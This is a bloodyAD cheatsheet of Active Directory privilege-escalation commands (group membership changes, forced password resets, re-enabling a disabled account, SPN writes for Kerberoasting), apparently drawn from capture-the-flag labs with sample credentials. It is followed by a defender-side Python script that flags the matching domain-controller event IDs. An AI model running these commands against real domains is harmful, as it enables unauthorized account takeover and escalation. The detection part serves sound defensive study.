bloodyAD is an Active Directory privilege escalation Swiss army knife.
https://github.com/CravateRouge/bloodyAD.
https://seriotonctf.github.io/BloodyAD-Cheatsheet/index.html
Add/Remove groupMember
bloodyAD -d "fluffy.htb" -u p.agila -p "prometheusx-303" --dc-ip 10.10.11.69 add groupMember 'service accounts' p.agila
Set/Reset Password
bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' 'Password!'
UAC (userAccountControl attribute) (Modify - set/remove)
bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac -f ACCOUNTDISABLE 'adam.silver'
SPN (Service Principal Name)
We modify the SPN if we have the WriteSPN privilege, so that we can perform a Kerberoasting attack, get the hash and hopefully crack the password.
bloodyAD -d voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' --kerberos --host dc.voleur.htb set object svc_winrm servicePrincipalName -v "http/newnameagainagain"
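Each of the four operations above leaves a standard Windows Security event on the domain controller, which is what a defender would alert on. The script below is an added, defender-side example; it is not part of this cheatsheet or of bloodyAD. It flags the relevant event IDs over constructed, simplified records: 4728/4732/4756 (member added to a group), 4724 (password reset by another account), 4738 (user account changed, including userAccountControl) and 5136 (directory object attribute modified, which only fires when Directory Service Changes auditing and a SACL on the object are configured). The SENSITIVE_GROUPS set and the sample record values are assumptions made for this example.

```python
# Added example (defender side), not from the cheatsheet or from bloodyAD:
# flag the Security events the bloodyAD operations above generate on a DC.
from dataclasses import dataclass

GROUP_MEMBER_ADDED = {4728, 4732, 4756}    # member added to global/local/universal group
GROUP_MEMBER_REMOVED = {4729, 4733, 4757}  # member removed from a group
PASSWORD_RESET = 4724                      # password reset attempted by another account
USER_ACCOUNT_CHANGED = 4738                # user account changed (carries UAC old/new values)
DS_OBJECT_MODIFIED = 5136                  # attribute write; needs DS Changes auditing + SACL

# Groups whose membership changes always get flagged (assumption for this example).
SENSITIVE_GROUPS = {"domain admins", "administrators", "service accounts"}


@dataclass(frozen=True)
class Finding:
    event_id: int
    subject: str   # account that made the change
    target: str    # object that was changed
    reason: str


def analyze(events):
    """Return one Finding per record that matches one of the operations above."""
    findings = []
    for e in events:
        eid = e["EventID"]
        subject = e.get("SubjectUserName", "?")
        if eid in GROUP_MEMBER_ADDED or eid in GROUP_MEMBER_REMOVED:
            group = e.get("TargetUserName", "")
            if group.lower() in SENSITIVE_GROUPS:
                verb = "added to" if eid in GROUP_MEMBER_ADDED else "removed from"
                findings.append(Finding(eid, subject, e.get("MemberName", ""),
                                        f"member {verb} sensitive group '{group}'"))
        elif eid == PASSWORD_RESET:
            target = e.get("TargetUserName", "")
            if subject.lower() != target.lower():
                findings.append(Finding(eid, subject, target,
                                        "password reset by a different account"))
        elif eid == USER_ACCOUNT_CHANGED:
            old, new = e.get("OldUacValue", ""), e.get("NewUacValue", "")
            # 4738 shows SAM-style UAC hex, not the LDAP attribute encoding; only a change is flagged.
            if old != new:
                findings.append(Finding(eid, subject, e.get("TargetUserName", ""),
                                        f"userAccountControl changed {old} -> {new}"))
        elif eid == DS_OBJECT_MODIFIED:
            if e.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname":
                findings.append(Finding(eid, subject, e.get("ObjectDN", ""),
                                        f"servicePrincipalName write: {e.get('AttributeValue', '')}"))
    return findings


# Constructed sample records, shaped like the EventData fields of the real events.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "p.agila", "TargetUserName": "Service Accounts",
     "MemberName": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 4724, "SubjectUserName": "ant.edwards", "TargetUserName": "adam.silver"},
    {"EventID": 4738, "SubjectUserName": "ant.edwards", "TargetUserName": "adam.silver",
     "OldUacValue": "0x11", "NewUacValue": "0x10"},          # constructed values
    {"EventID": 5136, "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "http/newnameagainagain"},
    # Benign noise that should not be flagged (hypothetical accounts/groups):
    {"EventID": 4724, "SubjectUserName": "adam.silver", "TargetUserName": "adam.silver"},
    {"EventID": 4728, "SubjectUserName": "helpdesk", "TargetUserName": "Printer Users",
     "MemberName": "CN=jdoe,CN=Users,DC=fluffy,DC=htb"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.subject} -> {f.target}: {f.reason}")
```

Run it as-is to see the four expected findings; in practice the records would come from the DC's Security log (for example via a SIEM export) and SENSITIVE_GROUPS would be filled from your own tiering model.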